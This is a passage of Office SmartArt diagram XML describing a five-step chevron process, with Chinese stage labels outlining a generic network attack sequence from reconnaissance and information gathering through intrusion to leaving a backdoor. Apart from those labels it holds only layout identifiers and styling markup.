      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{305223FD-0CBC-4969-B72C-6ABDCCAD7C8B}" type="pres">
      <dgm:prSet presAssocID="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" presName="bigChev" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44036B05-3EE9-46A8-925C-69821DB30515}" type="pres">
      <dgm:prSet presAssocID="{932F3E29-8C43-42DA-94FE-B91FC5FEE52E}" presName="parTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C8D1023-F37B-4AC2-B917-839BC525A8C2}" type="pres">
      <dgm:prSet presAssocID="{A4FBC933-FF8A-4E91-8BAE-5567988104E8}" presName="node" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65481A18-5CEB-4333-AE08-179EBEF6E803}" type="pres">
      <dgm:prSet presAssocID="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" presName="vSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E55E4A69-0B6E-480D-978A-8B8677B437FC}" type="pres">
      <dgm:prSet presAssocID="{0FE2E818-1E6C-4E18-8455-A9655112D269}" presName="horFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{45FD3591-EA83-451B-81BA-F875FC75574F}" type="pres">
      <dgm:prSet presAssocID="{0FE2E818-1E6C-4E18-8455-A9655112D269}" presName="bigChev" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DD848180-C555-4D5B-B1F3-417D15510D8C}" type="pres">
      <dgm:prSet presAssocID="{07D654DD-E41F-4841-8530-C07941994424}" presName="parTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F2B8B70-7CBA-4C33-95C4-F5F7BEA7BEDA}" type="pres">
      <dgm:prSet presAssocID="{FCFDB795-AD88-4633-8225-CDCE872FBDFF}" presName="node" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0AFD635C-859C-4F14-AD18-7D90C25817E6}" type="pres">
      <dgm:prSet presAssocID="{0FE2E818-1E6C-4E18-8455-A9655112D269}" presName="vSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9804ACA-F65C-412D-9E17-269F9F1A17D6}" type="pres">
      <dgm:prSet presAssocID="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" presName="horFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{464553F1-F566-41B4-A4E2-D4F3F66EE5C7}" type="pres">
      <dgm:prSet presAssocID="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" presName="bigChev" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9D0FFBD-01FE-4FEC-ACB8-DA064CEA7389}" type="pres">
      <dgm:prSet presAssocID="{02E0989F-838F-4028-A552-B02E1AAF25D1}" presName="parTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6993B75D-8261-4653-8236-9368EAEAA5DA}" type="pres">
      <dgm:prSet presAssocID="{8F03FEE5-C855-4653-B976-5D13F5D98209}" presName="node" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{871C1264-47BD-4427-B54A-62BC66605510}" type="pres">
      <dgm:prSet presAssocID="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" presName="vSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB729C76-0D0E-478F-B9F4-1A85A2D30A94}" type="pres">
      <dgm:prSet presAssocID="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}" presName="horFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B16094DE-C0F7-4F59-B269-D0E461B92465}" type="pres">
      <dgm:prSet presAssocID="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}" presName="bigChev" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7DD21ACB-D9DF-4B87-B10A-E05C965C58EB}" type="pres">
      <dgm:prSet presAssocID="{1C575ED6-897F-4907-8FDF-6783B239F51B}" presName="parTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E82D0B69-E2C1-4072-A113-41485980D2F2}" type="pres">
      <dgm:prSet presAssocID="{C924B6FF-0707-471A-AF20-942657BACE11}" presName="node" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B8CB4C01-DAB2-4BF9-A096-4EFDF4EF5F37}" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" srcOrd="0" destOrd="0" parTransId="{A9310A6E-51DC-413D-9314-48F634F1ED21}" sibTransId="{494A2B7C-066F-426B-BA60-760916A692AB}"/>
    <dgm:cxn modelId="{76B30D06-C0CE-4F68-8971-74072B6F363A}" srcId="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" destId="{A4FBC933-FF8A-4E91-8BAE-5567988104E8}" srcOrd="0" destOrd="0" parTransId="{932F3E29-8C43-42DA-94FE-B91FC5FEE52E}" sibTransId="{720EC36D-8E6E-4791-8A2A-C7F3BACB611A}"/>
    <dgm:cxn modelId="{0A5E2207-3499-4FF9-B13D-CA93A5222CA8}" type="presOf" srcId="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}" destId="{B16094DE-C0F7-4F59-B269-D0E461B92465}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{EF9F910E-D185-4BAA-9858-A676255BAC6E}" type="presOf" srcId="{A4FBC933-FF8A-4E91-8BAE-5567988104E8}" destId="{7C8D1023-F37B-4AC2-B917-839BC525A8C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{D757D812-0D61-4B80-AC5F-490B6FFB864F}" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" srcOrd="3" destOrd="0" parTransId="{79F7AB02-6D12-4C90-B899-C687A6478D3A}" sibTransId="{CC3B9718-0DF8-48B3-9D7F-BE5AF01E88CA}"/>
    <dgm:cxn modelId="{31685F1A-2203-4F69-89B5-C5217F601269}" srcId="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}" destId="{C924B6FF-0707-471A-AF20-942657BACE11}" srcOrd="0" destOrd="0" parTransId="{1C575ED6-897F-4907-8FDF-6783B239F51B}" sibTransId="{5572F623-A864-4F54-A7D9-6C627F3AFD7A}"/>
    <dgm:cxn modelId="{45557D23-FE19-496F-9F8A-8097C9096F62}" type="presOf" srcId="{8F03FEE5-C855-4653-B976-5D13F5D98209}" destId="{6993B75D-8261-4653-8236-9368EAEAA5DA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{CD04FB2B-1190-40A8-897F-61B57C4BEDFD}" type="presOf" srcId="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" destId="{464553F1-F566-41B4-A4E2-D4F3F66EE5C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{16A7254C-6E90-4EE4-BE4B-3399DE085C18}" srcId="{0FE2E818-1E6C-4E18-8455-A9655112D269}" destId="{FCFDB795-AD88-4633-8225-CDCE872FBDFF}" srcOrd="0" destOrd="0" parTransId="{07D654DD-E41F-4841-8530-C07941994424}" sibTransId="{7AF5F72D-D905-435D-890F-1CFE15E1908D}"/>
    <dgm:cxn modelId="{9111F14F-EC23-4145-82C1-BE1F94ABDDFE}" srcId="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" destId="{8F03FEE5-C855-4653-B976-5D13F5D98209}" srcOrd="0" destOrd="0" parTransId="{02E0989F-838F-4028-A552-B02E1AAF25D1}" sibTransId="{F9B2F2F4-6A8A-4289-97F5-AF60F835CEF9}"/>
    <dgm:cxn modelId="{FC758D55-F369-4A6F-ADDF-029D6605721D}" type="presOf" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{C0DAFE83-8C01-433E-AAA1-31E9034CE87F}" type="presOf" srcId="{C924B6FF-0707-471A-AF20-942657BACE11}" destId="{E82D0B69-E2C1-4072-A113-41485980D2F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{7DD9A389-35AF-432C-8594-0F1C3495B33F}" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" srcOrd="1" destOrd="0" parTransId="{63839089-E03F-4899-9EE0-93628AD98BC7}" sibTransId="{65871CC2-5958-47D6-86BA-227E5B599BB2}"/>
    <dgm:cxn modelId="{2DA75E96-2F3D-4632-84C8-07868AE4F272}" type="presOf" srcId="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" destId="{A6B71CE8-5198-421B-84BD-1D9102C5ADEC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{50377D97-48D5-4670-8EB0-4DDC5C520771}" type="presOf" srcId="{BFC8DBD0-E389-4CAE-BD1C-D215B0FF98E9}" destId="{A83D3B60-C7BE-491C-9720-07817B029B4E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{203A3FA9-9697-4630-A7FE-FA5DC683EE0C}" type="presOf" srcId="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" destId="{305223FD-0CBC-4969-B72C-6ABDCCAD7C8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{EC8459A9-BA98-4A0A-B56F-4227F803D69A}" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}" srcOrd="4" destOrd="0" parTransId="{1FDF98A6-9ACE-41C3-BD39-4E06EECFB688}" sibTransId="{C635D226-19CE-4BD4-9832-61DF0F9907DF}"/>
    <dgm:cxn modelId="{C5D4E3BF-C87C-4C05-9260-6368EED99F51}" srcId="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" destId="{BFC8DBD0-E389-4CAE-BD1C-D215B0FF98E9}" srcOrd="0" destOrd="0" parTransId="{0B9E3866-7D30-4197-9457-8E1549A7434D}" sibTransId="{CFC49F33-E624-4901-8BD4-D19136B37011}"/>
    <dgm:cxn modelId="{DEA4DCC7-320E-4473-9A3F-1283FBCB9638}" type="presOf" srcId="{FCFDB795-AD88-4633-8225-CDCE872FBDFF}" destId="{7F2B8B70-7CBA-4C33-95C4-F5F7BEA7BEDA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{DC3BFBC9-BCEA-4A39-8C59-712B40742BAC}" type="presOf" srcId="{0FE2E818-1E6C-4E18-8455-A9655112D269}" destId="{45FD3591-EA83-451B-81BA-F875FC75574F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{1A5EF3D5-7B6B-4F0A-BCEE-8A48526E8766}" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{0FE2E818-1E6C-4E18-8455-A9655112D269}" srcOrd="2" destOrd="0" parTransId="{52856666-A088-4F76-B82F-6683717BF3B8}" sibTransId="{BAD0D889-F436-4012-812A-69B541F9697C}"/>
    <dgm:cxn modelId="{224CD5A4-82A1-42CF-8546-CDF9D52D255A}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{E21C27E3-B126-4E6C-9F57-B29C4230AC39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{41EE4EBC-BA28-4B0C-9323-0077071E20A8}" type="presParOf" srcId="{E21C27E3-B126-4E6C-9F57-B29C4230AC39}" destId="{A6B71CE8-5198-421B-84BD-1D9102C5ADEC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{663A805D-46C6-474B-BFC2-9D60AA6BA1C2}" type="presParOf" srcId="{E21C27E3-B126-4E6C-9F57-B29C4230AC39}" destId="{486A7887-C8CA-4E66-B96C-9410B98C3DA6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{1D85B637-16CA-473D-A7B6-FB917FB130D6}" type="presParOf" srcId="{E21C27E3-B126-4E6C-9F57-B29C4230AC39}" destId="{A83D3B60-C7BE-491C-9720-07817B029B4E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{0FF170DA-CBD5-47EE-93FF-889F089012ED}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{317AF109-DDDD-4EA4-BA1C-5B94E4B3EEF5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{9CA77D57-C6C4-4D6C-B847-2C695C4FDF54}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{52498437-B727-4E2D-85F9-FD15A574BF44}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{04D53EEF-AEB0-4E40-AD79-B8142CEC7446}" type="presParOf" srcId="{52498437-B727-4E2D-85F9-FD15A574BF44}" destId="{305223FD-0CBC-4969-B72C-6ABDCCAD7C8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{4A5641CB-7F1C-4CD4-87A7-17C16F9D4823}" type="presParOf" srcId="{52498437-B727-4E2D-85F9-FD15A574BF44}" destId="{44036B05-3EE9-46A8-925C-69821DB30515}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{FB40FFAD-B138-4982-B3CC-3A522BDC6271}" type="presParOf" srcId="{52498437-B727-4E2D-85F9-FD15A574BF44}" destId="{7C8D1023-F37B-4AC2-B917-839BC525A8C2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{A08D1A07-C819-438E-91BD-5891A9BD1E36}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{65481A18-5CEB-4333-AE08-179EBEF6E803}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{368F0C6D-DC79-4C2E-ADE6-770BC7712B02}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{E55E4A69-0B6E-480D-978A-8B8677B437FC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{08441F41-D96D-49A9-BA88-50C7D756A8FF}" type="presParOf" srcId="{E55E4A69-0B6E-480D-978A-8B8677B437FC}" destId="{45FD3591-EA83-451B-81BA-F875FC75574F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{DC8CB731-9895-49F7-BD76-A5CB652F796A}" type="presParOf" srcId="{E55E4A69-0B6E-480D-978A-8B8677B437FC}" destId="{DD848180-C555-4D5B-B1F3-417D15510D8C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{AECDB0D6-8B7C-44DF-9BDF-B41D30AEC05F}" type="presParOf" srcId="{E55E4A69-0B6E-480D-978A-8B8677B437FC}" destId="{7F2B8B70-7CBA-4C33-95C4-F5F7BEA7BEDA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{21FA40E1-2E69-4A81-BE76-02CCA954CC1A}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{0AFD635C-859C-4F14-AD18-7D90C25817E6}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{B4F18403-CB08-4349-B0C9-5923BC8D649A}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{A9804ACA-F65C-412D-9E17-269F9F1A17D6}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{ABF95B36-9EDC-47C4-92F7-A11BCC07ACF1}" type="presParOf" srcId="{A9804ACA-F65C-412D-9E17-269F9F1A17D6}" destId="{464553F1-F566-41B4-A4E2-D4F3F66EE5C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{4B1A51F7-8740-4021-B71E-23FF75C6AB0C}" type="presParOf" srcId="{A9804ACA-F65C-412D-9E17-269F9F1A17D6}" destId="{C9D0FFBD-01FE-4FEC-ACB8-DA064CEA7389}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{B9043CAC-0B49-4F47-9218-BA43E37633E1}" type="presParOf" srcId="{A9804ACA-F65C-412D-9E17-269F9F1A17D6}" destId="{6993B75D-8261-4653-8236-9368EAEAA5DA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{722CD833-E23C-4D9B-8C4D-8775235234CC}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{871C1264-47BD-4427-B54A-62BC66605510}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{5C4E3C55-E5B7-4B6B-81A3-01905FEFCBA3}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{BB729C76-0D0E-478F-B9F4-1A85A2D30A94}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{3F005C33-9557-4FED-A95E-445DA539F71E}" type="presParOf" srcId="{BB729C76-0D0E-478F-B9F4-1A85A2D30A94}" destId="{B16094DE-C0F7-4F59-B269-D0E461B92465}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{A87E6C54-41B8-4581-9E07-57795729A264}" type="presParOf" srcId="{BB729C76-0D0E-478F-B9F4-1A85A2D30A94}" destId="{7DD21ACB-D9DF-4B87-B10A-E05C965C58EB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{7D5A6762-BA43-4F79-BC16-F31257F34D88}" type="presParOf" srcId="{BB729C76-0D0E-478F-B9F4-1A85A2D30A94}" destId="{E82D0B69-E2C1-4072-A113-41485980D2F2}"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A42EA-D98F-46F3-860B-F5810F25F6EA}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d2#1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>踩点</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9310A6E-51DC-413D-9314-48F634F1ED21}" type="parTrans" cxnId="{B8CB4C01-DAB2-4BF9-A096-4EFDF4EF5F37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{494A2B7C-066F-426B-BA60-760916A692AB}" type="sibTrans" cxnId="{B8CB4C01-DAB2-4BF9-A096-4EFDF4EF5F37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFC8DBD0-E389-4CAE-BD1C-D215B0FF98E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>收集信息</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B9E3866-7D30-4197-9457-8E1549A7434D}" type="parTrans" cxnId="{C5D4E3BF-C87C-4C05-9260-6368EED99F51}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFC49F33-E624-4901-8BD4-D19136B37011}" type="sibTrans" cxnId="{C5D4E3BF-C87C-4C05-9260-6368EED99F51}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>定位</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63839089-E03F-4899-9EE0-93628AD98BC7}" type="parTrans" cxnId="{7DD9A389-35AF-432C-8594-0F1C3495B33F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65871CC2-5958-47D6-86BA-227E5B599BB2}" type="sibTrans" cxnId="{7DD9A389-35AF-432C-8594-0F1C3495B33F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4FBC933-FF8A-4E91-8BAE-5567988104E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>分析目标</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{932F3E29-8C43-42DA-94FE-B91FC5FEE52E}" type="parTrans" cxnId="{76B30D06-C0CE-4F68-8971-74072B6F363A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{720EC36D-8E6E-4791-8A2A-C7F3BACB611A}" type="sibTrans" cxnId="{76B30D06-C0CE-4F68-8971-74072B6F363A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FE2E818-1E6C-4E18-8455-A9655112D269}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>入侵</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52856666-A088-4F76-B82F-6683717BF3B8}" type="parTrans" cxnId="{1A5EF3D5-7B6B-4F0A-BCEE-8A48526E8766}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAD0D889-F436-4012-812A-69B541F9697C}" type="sibTrans" cxnId="{1A5EF3D5-7B6B-4F0A-BCEE-8A48526E8766}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FCFDB795-AD88-4633-8225-CDCE872FBDFF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>实施攻击</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07D654DD-E41F-4841-8530-C07941994424}" type="parTrans" cxnId="{16A7254C-6E90-4EE4-BE4B-3399DE085C18}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AF5F72D-D905-435D-890F-1CFE15E1908D}" type="sibTrans" cxnId="{16A7254C-6E90-4EE4-BE4B-3399DE085C18}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>留后门</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79F7AB02-6D12-4C90-B899-C687A6478D3A}" type="parTrans" cxnId="{D757D812-0D61-4B80-AC5F-490B6FFB864F}">
      <dgm:prSet/>
      <dgm:spPr/>
